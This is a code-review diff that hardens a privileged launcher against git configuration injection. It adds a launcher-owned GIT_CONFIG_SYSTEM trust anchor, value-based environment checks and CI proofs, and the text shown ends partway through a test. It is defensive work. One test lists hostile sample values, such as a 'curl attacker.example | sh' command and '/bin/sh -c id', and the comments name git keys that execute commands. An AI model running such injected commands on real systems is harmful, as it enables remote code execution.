### PR TITLE
fix(goxi): give a brokered child a git trust anchor it cannot forge

### DIFF
--- a/.github/workflows/quality-gate.yml
+++ b/.github/workflows/quality-gate.yml
@@ -562,6 +562,15 @@ jobs:
       # fewer than this many actually execute, so a lane that quietly runs zero
       # tests can never be mistaken for a proven kernel boundary.
       ZF13_EXPECTED_PROOFS: "4"
+      # Number of `#[ignore]`d proofs `brokered_git_trust.rs` declares. They are
+      # the only place the cross-UID git contract is proven for real — a
+      # worktree owned by the WORKER uid and `git status` run by a process that
+      # has `setresuid`'d to CHILD_UID, with no test hook standing in for the
+      # uid mismatch. The suite's always-on
+      # `the_privileged_git_proofs_are_wired_and_cannot_silently_skip` reads
+      # this file back and fails if this declaration or the run below
+      # disappears (task goxi, sixth launcher blocker).
+      GIT_TRUST_EXPECTED_PROOFS: "2"
       # Number of `#[ignore]`d proofs `delegated_cpu_lease_lifecycle.rs`
       # declares. That suite is the ONLY place the CPU lease is proven to
       # actually govern CPU — measured on `cpu.stat` over a wall-clock window
@@ -613,6 +622,7 @@ jobs:
           cargo test -p djinn-cgroup-launcher \
             --test kernel_boundary_under_rendered_context \
             --test delegated_cpu_lease_lifecycle \
+            --test brokered_git_trust \
             --no-run --message-format=json > "$RUNNER_TEMP/build.json"
           binary=$(jq -r 'select(.executable != null and .target.name == "kernel_boundary_under_rendered_context") | .executable' "$RUNNER_TEMP/build.json" | tail -1)
           if [ -z "$binary" ] || [ ! -x "$binary" ]; then
@@ -626,6 +636,12 @@ jobs:
             exit 1
           fi
           echo "lease=$lease" >> "$GITHUB_OUTPUT"
+          git_trust=$(jq -r 'select(.executable != null and .target.name == "brokered_git_trust") | .executable' "$RUNNER_TEMP/build.json" | tail -1)
+          if [ -z "$git_trust" ] || [ ! -x "$git_trust" ]; then
+            echo "::error::could not locate the built brokered git-trust proof binary"
+            exit 1
+          fi
+          echo "git_trust=$git_trust" >> "$GITHUB_OUTPUT"
       - name: Prove the kernel boundary under the rendered security context
         run: |
           set -euo pipefail
@@ -677,6 +693,31 @@ jobs:
             exit 1
           fi
           echo "::notice::per-invocation CPU lease proven: $passed/$LEASE_LIFECYCLE_EXPECTED_PROOFS privileged proofs executed"
+      - name: Prove a brokered child can run git in a worker-owned worktree
+        run: |
+          set -euo pipefail
+          # goxi's sixth launcher blocker. The always-on half of this suite uses
+          # git's own GIT_TEST_ASSUME_DIFFERENT_OWNER hook so it runs in every
+          # shard; the `#[ignore]`d half below needs uid 0 to make the mismatch
+          # REAL — a worktree chowned to the worker uid, and `git status` run by
+          # a process that has setgroups(0)/setresgid/setresuid'd to CHILD_UID,
+          # exactly as `child::prepare_child` does. It also measures the umask
+          # dependency: at the container default 022 the worktree renders 2755
+          # and the child cannot write it at all.
+          #
+          # git is not in the base image; the proofs assert its presence rather
+          # than degrading, so install it before handing over.
+          docker run --rm --privileged --cgroupns=private \
+            -v "$GITHUB_WORKSPACE:$GITHUB_WORKSPACE" \
+            ubuntu:24.04 \
+            bash -c 'set -e; apt-get update -qq; DEBIAN_FRONTEND=noninteractive apt-get install -y -qq git >/dev/null; mkdir -p /workspace; exec "$0" --ignored --test-threads 1 --nocapture' \
+            "${{ steps.build.outputs.git_trust }}" 2>&1 | tee "$RUNNER_TEMP/git-trust.log"
+          passed=$(sed -n 's/^test result: ok\. \([0-9]*\) passed.*/\1/p' "$RUNNER_TEMP/git-trust.log" | tail -1)
+          if [ "${passed:-0}" != "$GIT_TRUST_EXPECTED_PROOFS" ]; then
+            echo "::error::the brokered git-trust lane executed ${passed:-0} proofs but $GIT_TRUST_EXPECTED_PROOFS are declared; the cross-UID git contract is NOT proven by this run"
+            exit 1
+          fi
+          echo "::notice::brokered git trust proven: $passed/$GIT_TRUST_EXPECTED_PROOFS privileged proofs executed"
   server-aarch64-check:
     name: Server aarch64 Check
     needs: preflight

--- a/scripts/capability-boundary-allowlist.toml
+++ b/scripts/capability-boundary-allowlist.toml
@@ -84,6 +84,14 @@ capability = "git"
 
 [[entries]]
 capability = "git"
+	path = "server/crates/djinn-cgroup-launcher/tests/brokered_git_trust.rs"
+	matcher = "Command::new(\"git\")"
+	owner = "team/launcher"
+	rationale = "Proves the brokered child's git trust anchor by running REAL git against a real repository under real child credentials. It cannot go through djinn-git: djinn-git wraps the SERVER's git invocations with the server's own trust anchor, which is the opposite side of the boundary under test, and djinn-cgroup-launcher is a privileged sidecar crate that deliberately depends only on libc + thiserror. Test-only; the launcher never spawns git in production."
+	cleanup_issue = "epic/kh95"
+
+[[entries]]
+capability = "git"
 	path = "server/crates/djinn-coordinator/src/tests/mod.rs"
 	matcher = "Command::new(\"git\")"
 	owner = "team/coordinator"

--- a/server/crates/djinn-agent/src/process_broker.rs
+++ b/server/crates/djinn-agent/src/process_broker.rs
@@ -246,11 +246,14 @@ fn command_spec(command: Command) -> io::Result<CommandSpec> {
 ///
 /// The fix keeps the allow-list closed and forwards through it:
 /// `djinn_cgroup_launcher::is_allowed_environment_key` is the single predicate,
-/// applied here as a convenience and re-applied inside the privileged broker by
-/// `CommandSpec::validate`, which is the actual control. Explicit per-command
-/// values win over inherited ones; the launcher then overrides the parallelism
-/// pins with values derived from the quota the leaf will really run at, because
-/// only it knows that.
+/// applied here as a convenience. The actual control is inside the privileged
+/// broker, in `CommandSpec::validate`, and it is the strictly stronger
+/// `is_allowed_environment_entry`: one forwardable name (`GIT_CONFIG_SYSTEM`)
+/// points at a *configuration file*, so it is judged by its value and not its
+/// key. Explicit per-command values win over inherited ones; the launcher then
+/// overrides the parallelism pins — and the git trust anchor — with values it
+/// derives itself, because only it knows the quota the leaf will really run at
+/// and only it owns a git config file that is safe to point a child at.
 fn child_environment(command: &Command) -> io::Result<Vec<(String, String)>> {
     use std::collections::BTreeMap;
 

--- a/server/crates/djinn-cgroup-launcher/src/env.rs
+++ b/server/crates/djinn-cgroup-launcher/src/env.rs
@@ -39,6 +39,27 @@
 //! before `execve`, and while `no_new_privs` and the glibc secure-execution
 //! rules already neutralise them there, keeping them off the list means the
 //! boundary does not *depend* on that reasoning.
+//!
+//! Every `GIT_CONFIG_*` variable is absent for a stronger reason:
+//! `GIT_CONFIG_COUNT`/`KEY_n`/`VALUE_n` sets **arbitrary** git configuration,
+//! and `core.sshCommand`, `core.pager`, `core.editor`, `diff.external`,
+//! `filter.<x>.clean` and `credential.helper` are all arbitrary command
+//! execution. A key-name allow-list is no defence at all here, because
+//! `GIT_CONFIG_KEY_0` is the allowed *name* whose *value* names the dangerous
+//! key. `GIT_CONFIG_NOSYSTEM` is absent too, and that is load-bearing rather
+//! than tidy: measured, it makes git ignore the trust anchor below and restores
+//! the exact production failure.
+//!
+//! # The one git variable the launcher DOES set
+//!
+//! The brokered child needs `safe.directory` or every `git` command in the
+//! worker-owned workspace fails "dubious ownership". That arrives as
+//! [`crate::git_trust`]'s launcher-written config **file**, exported as
+//! `GIT_CONFIG_SYSTEM` — derived by the launcher and overridden on every spawn,
+//! exactly like the parallelism pins, and admitted by [`is_allowed_environment_entry`]
+//! only when its value is byte-identical to the launcher's own anchor path.
+
+pub use crate::git_trust::GIT_TRUST_ANCHOR_KEY;
 
 /// Exact environment keys the broker forwards to a launched child.
 ///
@@ -138,6 +159,48 @@ pub fn is_allowed_environment_key(key: &str) -> bool {
         || ALLOWED_PREFIXES
             .iter()
             .any(|prefix| key.starts_with(prefix))
+}
+
+/// Is the `key=value` **entry** forwardable to a launched child?
+///
+/// This — not [`is_allowed_environment_key`] — is what `CommandSpec::validate`
+/// applies inside the privileged broker, because one entry cannot be judged by
+/// its key alone.
+///
+/// [`GIT_TRUST_ANCHOR_KEY`] names a git configuration *file*. Any file. Admitting
+/// it on the strength of its name would let a caller point the child's system
+/// git config at something it wrote — `core.sshCommand = <anything>` — which is
+/// arbitrary command execution across the boundary the broker exists to
+/// establish. So it is admitted only when the value is byte-identical to
+/// [`crate::git_trust::anchor_path`]: a path this process chose, in a directory
+/// this process owns and no other identity can write, holding contents this
+/// process wrote. A caller cannot name it usefully (the launcher overwrites the
+/// value on every spawn regardless) and cannot name anything else at all.
+///
+/// Every other key is judged by name, as before.
+pub fn is_allowed_environment_entry(key: &str, value: &str) -> bool {
+    if key == GIT_TRUST_ANCHOR_KEY {
+        return crate::git_trust::is_anchor_value(value);
+    }
+    is_allowed_environment_key(key)
+}
+
+/// Apply the launcher's git trust anchor over `environment`, replacing whatever
+/// the caller supplied for [`GIT_TRUST_ANCHOR_KEY`].
+///
+/// Same shape and the same reasoning as [`apply_parallelism_pins`]: a caller may
+/// legitimately carry the key (the pod renders git configuration), but the value
+/// the child sees is always the launcher's, because only the launcher knows —
+/// and owns — the file that is safe to point at.
+pub fn apply_git_trust_anchor(environment: &mut Vec<(String, String)>, anchor: &std::path::Path) {
+    let value = anchor.display().to_string();
+    match environment
+        .iter_mut()
+        .find(|(existing, _)| existing == GIT_TRUST_ANCHOR_KEY)
+    {
+        Some(slot) => slot.1 = value,
+        None => environment.push((GIT_TRUST_ANCHOR_KEY.to_owned(), value)),
+    }
 }
 
 /// Parallelism pin keys the launcher **overrides** on every spawn.
@@ -266,6 +329,99 @@ mod tests {
                 "{required} must reach a brokered build"
             );
         }
+    }
+
+    /// `GIT_CONFIG_COUNT`/`KEY_n`/`VALUE_n` is an arbitrary-config injection
+    /// primitive and several git keys are arbitrary command execution, so the
+    /// env form must stay shut — by key AND as a whole entry, since the
+    /// dangerous name travels in the *value*.
+    #[test]
+    fn the_git_config_injection_primitive_is_not_forwardable_in_any_form() {
+        for (key, value) in [
+            ("GIT_CONFIG_COUNT", "1"),
+            ("GIT_CONFIG_KEY_0", "safe.directory"),
+            ("GIT_CONFIG_KEY_0", "core.sshCommand"),
+            ("GIT_CONFIG_VALUE_0", "curl attacker.example | sh"),
+            ("GIT_CONFIG_KEY_12", "core.pager"),
+            ("GIT_CONFIG_VALUE_12", "/bin/sh -c id"),
+            // Would make git ignore the anchor entirely — measured, it restores
+            // the exact "dubious ownership" failure.
+            ("GIT_CONFIG_NOSYSTEM", "1"),
+            // Would redirect the read of `$HOME/.gitconfig`, where
+            // `configure_private_dep_access` stores the installation token.
+            ("GIT_CONFIG_GLOBAL", "/workspace/evil"),
+            ("GIT_CONFIG", "/workspace/evil"),
+            ("GIT_SSH_COMMAND", "/workspace/evil"),
+            ("GIT_PAGER", "/workspace/evil"),
+            ("GIT_EXTERNAL_DIFF", "/workspace/evil"),
+            ("GIT_ALTERNATE_OBJECT_DIRECTORIES", "/workspace/objects"),
+        ] {
+            assert!(
+                !is_allowed_environment_key(key),
+                "{key} must not be forwardable by name"
+            );
+            assert!(
+                !is_allowed_environment_entry(key, value),
+                "{key}={value} must not be forwardable as an entry"
+            );
+        }
+    }
+
+    /// The anchor key is admitted by VALUE, not by name: the launcher's own
+    /// path and nothing else.
+    #[test]
+    fn the_trust_anchor_key_admits_only_the_launchers_own_file() {
+        let anchor = crate::git_trust::anchor_path()
+            .expect("the anchor must materialize in a test environment")
+            .display()
+            .to_string();
+        assert!(is_allowed_environment_entry(GIT_TRUST_ANCHOR_KEY, &anchor));
+        assert!(
+            !is_allowed_environment_key(GIT_TRUST_ANCHOR_KEY),
+            "the anchor key must never be forwardable on its name alone; that is what \
+             would let a caller point the child's system config at a file it wrote"
+        );
+        for hostile in [
+            "/workspace/wt/.evil-gitconfig",
+            "/home/djinn/.gitconfig",
+            "/etc/gitconfig",
+            "",
+            // A path that merely starts with the anchor's own.
+            &format!("{anchor}-attacker"),
+        ] {
+            assert!(
+                !is_allowed_environment_entry(GIT_TRUST_ANCHOR_KEY, hostile),
+                "{hostile} must not pass as the launcher's trust anchor"
+            );
+        }
+    }
+
+    #[test]
+    fn the_trust_anchor_overrides_a_caller_supplied_value_and_keeps_position() {
+        let anchor = std::path::Path::new("/tmp/djinn-launcher-git-0/gitconfig");
+        let mut environment = vec![
+            ("PATH".to_owned(), "/usr/bin".to_owned()),
+            (
+                GIT_TRUST_ANCHOR_KEY.to_owned(),
+                "/workspace/evil".to_owned(),
+            ),
+            ("HOME".to_owned(), "/home/djinn".to_owned()),
+        ];
+        apply_git_trust_anchor(&mut environment, anchor);
+        assert_eq!(
+            environment[1],
+            (
+                GIT_TRUST_ANCHOR_KEY.to_owned(),
+                anchor.display().to_string()
+            ),
+            "a caller value must be overridden in place, never duplicated"
+        );
+        assert_eq!(environment.len(), 3);
+
+        let mut absent = vec![("PATH".to_owned(), "/usr/bin".to_owned())];
+        apply_git_trust_anchor(&mut absent, anchor);
+        assert_eq!(absent.len(), 2);
+        assert_eq!(absent[1].0, GIT_TRUST_ANCHOR_KEY);
     }
 
     #[test]

--- a/server/crates/djinn-cgroup-launcher/src/git_trust.rs
+++ b/server/crates/djinn-cgroup-launcher/src/git_trust.rs
@@ -325,10 +325,36 @@ fn anchor_is_intact(path: &Path) -> bool {
 /// through [`anchor_path`].
 pub fn materialize_in(root: &Path) -> io::Result<PathBuf> {
     let path = anchor_dir_in(root)?.join(ANCHOR_BASENAME);
-    write_anchor(
-        &path,
-        &anchor_contents(system_config_to_chain(&path).as_deref()),
-    )?;
+    let chain = system_config_to_chain(&path);
+    materialize_in_with_system(root, chain.as_deref())
+}
+
+/// [`materialize_in`], but chaining to `system_config` instead of discovering
+/// `/etc/gitconfig`.
+///
+/// Exists so a behavioural test can be hermetic against the HOST's system
+/// config. That is not hypothetical: a GitHub Actions runner ships
+///
+/// ```text
+/// /etc/gitconfig:  [safe]  directory = *
+/// ```
+///
+/// which trusts every repository for every process on the machine. A suite that
+/// inherited it would see its non-vacuity control — "with the fix reverted, real
+/// git must fail" — pass with exit 0 and empty stderr, and its positive control
+/// succeed for a reason that has nothing to do with the launcher. It did exactly
+/// that on the first CI run of this change. Pointing the chain at a controlled,
+/// empty file models the launcher container, which was measured on the
+/// production node to have **no** `/etc/gitconfig` at all.
+///
+/// The bytes are still produced by [`anchor_contents`] and still written by
+/// [`write_anchor`], so what a test exercises is the production writer.
+pub fn materialize_in_with_system(
+    root: &Path,
+    system_config: Option<&Path>,
+) -> io::Result<PathBuf> {
+    let path = anchor_dir_in(root)?.join(ANCHOR_BASENAME);
+    write_anchor(&path, &anchor_contents(system_config))?;
     Ok(path)
 }
 

--- a/server/crates/djinn-cgroup-launcher/src/git_trust.rs
+++ b/server/crates/djinn-cgroup-launcher/src/git_trust.rs
@@ -1,0 +1,586 @@
+//! The git trust anchor a brokered child is born with, and why it is a **file**
+//! the launcher owns rather than an environment variable the caller supplies.
+//!
+//! # The blocker (goxi, sixth in the chain)
+//!
+//! A task workspace is created by the worker (uid 1000). A brokered command runs
+//! as [`CHILD_UID`](crate::child::CHILD_UID) (1001). git compares the repository
+//! directory's **owner uid** against the process uid — group ownership and mode
+//! do not enter into it — so every brokered `git` invocation dies before it does
+//! any work. Measured in a rendered launcher container on the production node:
+//!
+//! ```text
+//! # setpriv --reuid=1001 --regid=1000 --clear-groups git -C /workspace/wt status
+//! fatal: detected dubious ownership in repository at '/workspace/wt'
+//! ```
+//!
+//! `djinn-k8s`'s `job.rs` renders `GIT_CONFIG_COUNT` / `GIT_CONFIG_KEY_0` /
+//! `GIT_CONFIG_VALUE_0` = `safe.directory=*` onto the pod for exactly this
+//! reason, but [`is_allowed_environment_key`](crate::is_allowed_environment_key)
+//! carries no `GIT_` entry, so `process_broker::child_environment` strips all
+//! three on the way to the broker. The child is left with no trust rule at all.
+//!
+//! # Why the fix is not "allow those three keys through"
+//!
+//! Two independent reasons, and either one alone is decisive.
+//!
+//! ## 1. `GIT_CONFIG_KEY_n` is an arbitrary-config injection primitive
+//!
+//! `GIT_CONFIG_COUNT`/`KEY_n`/`VALUE_n` sets *any* configuration key. Several are
+//! direct command execution: `core.sshCommand`, `core.pager`, `core.editor`,
+//! `diff.external`, `filter.<x>.clean`, `credential.helper`. Allow-listing the
+//! key **names** does not help — `GIT_CONFIG_KEY_0` is an allowed name whose
+//! *value* is `core.sshCommand`. The forwarded environment originates in the
+//! worker, which relays a `Command` an agent tool built, so the value is not
+//! trustworthy input. A key-only allow-list would therefore hand every brokered
+//! child arbitrary command execution through the one seam that exists to
+//! constrain it.
+//!
+//! This module closes that: the three env-form keys stay **unforwardable**, and
+//! the one key that is accepted, `GIT_CONFIG_SYSTEM`, is accepted only when its
+//! value is byte-identical to [`anchor_path`] — a path the launcher chose, whose
+//! contents the launcher wrote. See
+//! [`is_allowed_environment_entry`](crate::env::is_allowed_environment_entry).
+//!
+//! ## 2. The env form does not actually work (nurw, PR #2575)
+//!
+//! Even setting security aside, `GIT_CONFIG_COUNT`/`KEY`/`VALUE` is
+//! command-scope configuration, and git **strips it from processes it spawns
+//! itself**:
+//!
+//! ```text
+//! trace: run_command: unset GIT_CONFIG_COUNT GIT_DIR; git-upload-pack '<src>'
+//! ```
+//!
+//! So `git status` in the worktree is trusted while the `git-upload-pack` child
+//! that `git clone --local` uses for ref discovery is not. That is not a corner
+//! case here: cloning the `/mirror` PVC is what the workspace is made of. The
+//! same measurement was made in `djinn-git/src/lib.rs`, on the same git version
+//! that ships in the deployed image, and reproduced locally on git 2.54.0:
+//!
+//! ```text
+//! GIT_TEST_ASSUME_DIFFERENT_OWNER=1 git status
+//!   (nothing)                                       -> dubious ownership, FAILS
+//!   GIT_CONFIG_SYSTEM=<file holding safe.directory> -> exit 0
+//!   GIT_CONFIG_SYSTEM=<file> GIT_CONFIG_NOSYSTEM=1  -> dubious ownership, FAILS
+//!   GIT_CONFIG_SYSTEM=<missing file>                -> dubious ownership, FAILS
+//! ```
+//!
+//! `safe.directory` is only honoured from **protected** scope (system/global) in
+//! the first place, which is why the answer is a config file and not `git -c`.
+//!
+//! Re-measured for THIS blocker in a rendered launcher container on the
+//! production node, against a real `/workspace/wt` owned `1000:1000` with a real
+//! uid-1001 child — no test hook — and it settles the choice on its own:
+//!
+//! ```text
+//! # setpriv --reuid=1001 --regid=1000 --clear-groups ...
+//!   (broker strips every GIT_ var — today)   git status        -> rc 128, dubious ownership
+//!   GIT_CONFIG_COUNT=1 KEY_0=safe.directory  git status        -> rc 0
+//!   GIT_CONFIG_COUNT=1 KEY_0=safe.directory  git clone --local -> rc 128, dubious ownership
+//!   GIT_CONFIG_SYSTEM=<anchor>               git status        -> rc 0
+//!   GIT_CONFIG_SYSTEM=<anchor>               git clone --local -> rc 0
+//! ```
+//!
+//! So widening the allow-list to those three keys — the "obvious" fix — would
+//! have taken the security hit AND still left `git clone --local` broken, which
+//! is how the workspace is made.
+//!
+//! # Why SYSTEM scope and not GLOBAL
+//!
+//! `djinn_agent_worker`'s `configure_private_dep_access` stores the GitHub
+//! installation token as a `url.<...>.insteadOf` rewrite with
+//! `git config --global`, and cargo / go / pnpm read it back out of
+//! `$HOME/.gitconfig` with djinn nowhere in the loop. Pointing
+//! `GIT_CONFIG_GLOBAL` at a launcher-owned file would redirect that read into a
+//! file those tools never wrote and silently break every private-dependency
+//! fetch. System scope is purely additive: `$HOME/.gitconfig` and the XDG config
+//! keep being read exactly as before.
+//!
+//! # Why the generated file `[include]`s the real system config
+//!
+//! `GIT_CONFIG_SYSTEM` **replaces** `/etc/gitconfig`; it does not add to it. A
+//! bare `[safe] directory = *` file would silently drop whatever the image put
+//! in `/etc/gitconfig`. The generated file therefore chains to it, and the
+//! include is verified to work in [`tests`] rather than assumed.
+//!
+//! # The three properties the file itself must have
+//!
+//! * **Readable by the child.** It is exported to uid 1001; the directory is
+//!   `0755` and the file `0644`, set with an explicit `chmod` rather than
+//!   inherited from an ambient umask.
+//! * **Not writable by the child.** The directory is owned by the launcher uid
+//!   and is not group- or other-writable, so uid 1001 cannot replace the file
+//!   with one naming `core.sshCommand` — measured on the production node:
+//!   `touch` and `>>` both return `Permission denied`. That is re-verified on
+//!   every spawn (`lstat`, never following a symlink) and fails closed. The
+//!   scratch root ABOVE it needs one repair; see
+//!   [`restore_sticky_scratch_semantics`].
+//! * **Present.** git ignores a `GIT_CONFIG_SYSTEM` that points at a missing
+//!   file *silently* (measured above), so a temp-directory reaper would bring
+//!   the dubious-ownership failure back days into a pod's life with nothing in
+//!   the logs. Every call re-materializes a file that has gone missing.
+
+use std::io;
+use std::path::{Path, PathBuf};
+
+use crate::Error;
+
+/// The one environment variable the launcher injects for git.
+pub const GIT_TRUST_ANCHOR_KEY: &str = "GIT_CONFIG_SYSTEM";
+
+/// Basename of the generated config inside [`anchor_dir_in`].
+const ANCHOR_BASENAME: &str = "gitconfig";
+
+/// Real system config the generated file chains to when it exists.
+const SYSTEM_CONFIG: &str = "/etc/gitconfig";
+
+/// The `safe.directory` value the launcher writes.
+///
+/// `*` rather than an enumerated list. The check only fires for repositories
+/// owned by *another* uid, and the brokered child owns nothing: every path it
+/// can reach is a pod volume created by the worker or by the kubelet. Listing
+/// them explicitly would mean threading deployment-configured mount roots into
+/// the launcher and failing closed — a wedged workspace — the first time a new
+/// shared location appeared, which is the exact silent failure this exists to
+/// remove.
+const SAFE_DIRECTORY_VALUE: &str = "*";
+
+/// Permission bits that must NOT be set on the anchor directory: if the child's
+/// group or "other" could write it, the child could replace the anchor.
+const FORBIDDEN_DIR_WRITE: u32 = 0o022;
+
+/// Effective uid of this process.
+fn effective_uid() -> u32 {
+    // SAFETY: `geteuid` always succeeds and takes no arguments.
+    unsafe { libc::geteuid() }
+}
+
+/// Sticky bit — without it, write permission on a directory is permission to
+/// rename or unlink *anything* in it, including entries owned by someone else.
+const MODE_STICKY: u32 = 0o1000;
+/// Other-write.
+const MODE_OTHER_WRITE: u32 = 0o002;
+
+/// Give `root` the `1777` semantics a real `/tmp` has, when we own it.
+///
+/// An `emptyDir` is not `/tmp`. Measured in a rendered launcher container on the
+/// production node, the scratch volume mounted at `/tmp` arrives `2777` —
+/// world-writable with **no sticky bit** — so a child holding no privilege at
+/// all could displace a root-owned directory inside it:
+///
+/// ```text
+/// # setpriv --reuid=1001 --regid=1000 --clear-groups mv /tmp/djinn-launcher-git-0 /tmp/stolen
+/// (rc 0)
+/// # chmod 1777 /tmp   ->  3777
+/// # setpriv ... mv /tmp/djinn-launcher-git-0 /tmp/stolen2
+/// mv: cannot move ...: Operation not permitted   (rc 1)
+/// ```
+///
+/// The ownership check below already fails closed on a displaced directory, so
+/// this is not what keeps a hostile config out — it keeps a child from denying
+/// git to every *later* command in the pod, and it restores the mode every other
+/// process sharing that scratch surface already assumes.
+///
+/// Best-effort by design: not owning the root is not an error, it just means the
+/// fail-closed check is the only protection, which is the pre-existing state.
+fn restore_sticky_scratch_semantics(root: &Path) {
+    use std::os::unix::fs::{MetadataExt, PermissionsExt};
+
+    let Ok(metadata) = std::fs::symlink_metadata(root) else {
+        return;
+    };
+    let mode = metadata.mode();
+    if !metadata.is_dir()
+        || metadata.uid() != effective_uid()
+        || mode & MODE_OTHER_WRITE == 0
+        || mode & MODE_STICKY != 0
+    {
+        return;
+    }
+    let _ = std::fs::set_permissions(
+        root,
+        std::fs::Permissions::from_mode((mode & 0o7777) | MODE_STICKY),
+    );
+}
+
+/// `{root}/djinn-launcher-git-{euid}` — created private to this uid.
+///
+/// Per-uid so two identities sharing a `/tmp` cannot collide, and an existing
+/// directory is accepted only when it is a real directory (never a symlink)
+/// owned by us that no other user can write. A pre-planted path therefore
+/// cannot be used to feed configuration to a brokered child.
+fn anchor_dir_in(root: &Path) -> io::Result<PathBuf> {
+    use std::os::unix::fs::{DirBuilderExt, MetadataExt, PermissionsExt};
+
+    restore_sticky_scratch_semantics(root);
+    let dir = root.join(format!("djinn-launcher-git-{}", effective_uid()));
+    match std::fs::DirBuilder::new().mode(0o755).create(&dir) {
+        Ok(()) => {
+            // `DirBuilder::mode` is masked by the process umask, and the child
+            // must be able to *read* this directory. Set the bits explicitly.
+            std::fs::set_permissions(&dir, std::fs::Permissions::from_mode(0o755))?;
+            return Ok(dir);
+        }
+        Err(err) if err.kind() == io::ErrorKind::AlreadyExists => {}
+        Err(err) => return Err(err),
+    }
+    // `symlink_metadata`: never follow a symlink another identity may have
+    // planted where we expect a directory.
+    let metadata = std::fs::symlink_metadata(&dir)?;
+    if !metadata.is_dir()
+        || metadata.uid() != effective_uid()
+        || metadata.mode() & FORBIDDEN_DIR_WRITE != 0
+    {
+        return Err(io::Error::other(format!(
+            "{} is not a directory owned by uid {} and writable only by it; refusing to \
+             read git configuration from it",
+            dir.display(),
+            effective_uid()
+        )));
+    }
+    Ok(dir)
+}
+
+/// Body of the generated system-scope config, chaining to `chain` when present.
+pub fn anchor_contents(chain: Option<&Path>) -> String {
+    let mut contents = String::from(
+        "# Generated by djinn-cgroup-launcher. Do not edit; rewritten on every spawn.\n\
+         #\n\
+         # A brokered child runs as a uid that owns none of the pod's volumes, so git\n\
+         # refuses every repository under them (\"dubious ownership\") without a\n\
+         # safe.directory rule in PROTECTED scope. See djinn-cgroup-launcher/src/git_trust.rs.\n",
+    );
+    if let Some(chain) = chain {
+        contents.push_str("[include]\n\tpath = ");
+        contents.push_str(&quote_config_value(chain));
+        contents.push('\n');
+    }
+    contents.push_str("[safe]\n\tdirectory = ");
+    contents.push_str(SAFE_DIRECTORY_VALUE);
+    contents.push('\n');
+    contents
+}
+
+/// Quote a path as a git config value (git unescapes `\\` and `\"` inside `"`).
+fn quote_config_value(path: &Path) -> String {
+    let mut quoted = String::from("\"");
+    for ch in path.to_string_lossy().chars() {
+        if ch == '\\' || ch == '"' {
+            quoted.push('\\');
+        }
+        quoted.push(ch);
+    }
+    quoted.push('"');
+    quoted
+}
+
+/// The real system config to chain to, or `None` when there is none to chain.
+fn system_config_to_chain(generated: &Path) -> Option<PathBuf> {
+    let candidate = PathBuf::from(SYSTEM_CONFIG);
+    (candidate != generated && candidate.is_file()).then_some(candidate)
+}
+
+/// Write `contents` to `path` atomically, world-readable.
+///
+/// World-readable because the reader is a *different* uid than the writer by
+/// construction. The file holds a `safe.directory` rule and an include path and
+/// never a secret. The staging file is created with `O_EXCL` and `O_NOFOLLOW`,
+/// so even inside a directory whose ownership check somehow passed, the
+/// privileged writer cannot be redirected through a planted symlink.
+fn write_anchor(path: &Path, contents: &str) -> io::Result<()> {
+    use std::io::Write;
+    use std::os::unix::fs::{OpenOptionsExt, PermissionsExt};
+
+    let staging = path.with_file_name(format!("{ANCHOR_BASENAME}.{}.tmp", std::process::id()));
+    let _ = std::fs::remove_file(&staging);
+    let mut file = std::fs::OpenOptions::new()
+        .write(true)
+        .create_new(true)
+        .custom_flags(libc::O_NOFOLLOW)
+        .mode(0o644)
+        .open(&staging)?;
+    file.write_all(contents.as_bytes())?;
+    drop(file);
+    // Explicit, because `OpenOptions::mode` is masked by the process umask and
+    // the child must be able to read this file.
+    std::fs::set_permissions(&staging, std::fs::Permissions::from_mode(0o644))?;
+    std::fs::rename(&staging, path)
+}
+
+/// Is `path` a regular file this process owns that nobody else can write?
+fn anchor_is_intact(path: &Path) -> bool {
+    use std::os::unix::fs::MetadataExt;
+
+    std::fs::symlink_metadata(path).is_ok_and(|metadata| {
+        metadata.is_file()
+            && metadata.uid() == effective_uid()
+            && metadata.mode() & FORBIDDEN_DIR_WRITE == 0
+    })
+}
+
+/// (Re-)establish the anchor under `root` and return its path.
+///
+/// Exposed for tests, which must not share a global anchor. Production goes
+/// through [`anchor_path`].
+pub fn materialize_in(root: &Path) -> io::Result<PathBuf> {
+    let path = anchor_dir_in(root)?.join(ANCHOR_BASENAME);
+    write_anchor(
+        &path,
+        &anchor_contents(system_config_to_chain(&path).as_deref()),
+    )?;
+    Ok(path)
+}
+
+static ANCHOR: std::sync::OnceLock<Option<PathBuf>> = std::sync::OnceLock::new();
+
+/// Path of the launcher's git trust anchor, materialized on first use and
+/// re-verified on every call.
+///
+/// Fails closed. There is deliberately no fallback to the command-scope
+/// `GIT_CONFIG_*` form: it is the injection primitive this module exists to keep
+/// shut, and nurw measured that it does not survive into `git clone --local`'s
+/// inner child anyway, so "falling back" would mean shipping a security hole
+/// that does not even fix the bug.
+pub fn anchor_path() -> Result<&'static Path, Error> {
+    let path = ANCHOR
+        .get_or_init(|| materialize_in(&std::env::temp_dir()).ok())
+        .as_deref()
+        .ok_or(Error::GitTrustAnchorUnavailable)?;
+
+    // Self-heal. A temp-directory reaper can delete the file, and git ignores a
+    // `GIT_CONFIG_SYSTEM` pointing at a missing file *silently* — which would
+    // bring "dubious ownership" back days into a pod's life with nothing in the
+    // logs. One `lstat` per spawn is free next to the fork/exec, and it also
+    // catches a file whose ownership or mode changed under us.
+    if !anchor_is_intact(path) {
+        let contents = anchor_contents(system_config_to_chain(path).as_deref());
+        write_anchor(path, &contents).map_err(|_| Error::GitTrustAnchorUnavailable)?;
+        if !anchor_is_intact(path) {
+            return Err(Error::GitTrustAnchorUnavailable);
+        }
+    }
+    Ok(path)
+}
+
+/// Is `value` exactly the launcher's own anchor path?
+///
+/// The whole value constraint behind `GIT_CONFIG_SYSTEM`'s admission to the
+/// forwardable set. A caller-supplied path — which could name a file holding
+/// `core.sshCommand` — is not equal to the anchor and is refused.
+pub fn is_anchor_value(value: &str) -> bool {
+    anchor_path().is_ok_and(|anchor| anchor == Path::new(value))
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use std::os::unix::fs::{MetadataExt, PermissionsExt};
+
+    fn temp_root(name: &str) -> PathBuf {
+        let root = std::env::temp_dir().join(format!(
+            "djinn-git-trust-test-{}-{name}-{}",
+            std::process::id(),
+            effective_uid()
+        ));
+        let _ = std::fs::remove_dir_all(&root);
+        std::fs::create_dir_all(&root).expect("create test root");
+        root
+    }
+
+    #[test]
+    fn the_anchor_is_readable_by_another_uid_and_writable_by_none() {
+        let root = temp_root("modes");
+        let path = materialize_in(&root).expect("materialize");
+        let file = std::fs::symlink_metadata(&path).expect("stat anchor");
